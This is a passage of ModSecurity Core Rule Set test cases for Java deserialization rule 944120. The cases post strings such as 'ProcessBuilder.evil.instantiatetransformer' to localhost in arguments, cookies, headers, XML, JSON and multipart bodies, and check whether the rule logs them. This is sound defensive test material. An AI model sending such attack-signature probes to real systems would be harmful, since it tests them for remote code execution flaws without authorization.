"ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-23 - desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-24 - desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-25 - desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-26 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-27 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-28 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-29 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-30 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.forclosure\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-31 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.forclosure\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-32 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.forclosure\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-33 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.forclosure\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-34 - desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-35 - desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-36 - desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-37 - desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatefactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-38 - desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-39 - desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-40 - desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-41 - desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-42 - desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-43 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-44 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-45 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-46 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-47 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-48 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-49 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.instantiatefactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-50 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.instantiatefactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-51 - desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-52 - desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-53 - desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-54 - desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatetransformer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-55 - desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-56 - desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-57 - desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-58 - desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-59 - desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-60 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-61 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-62 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-63 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-64 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - 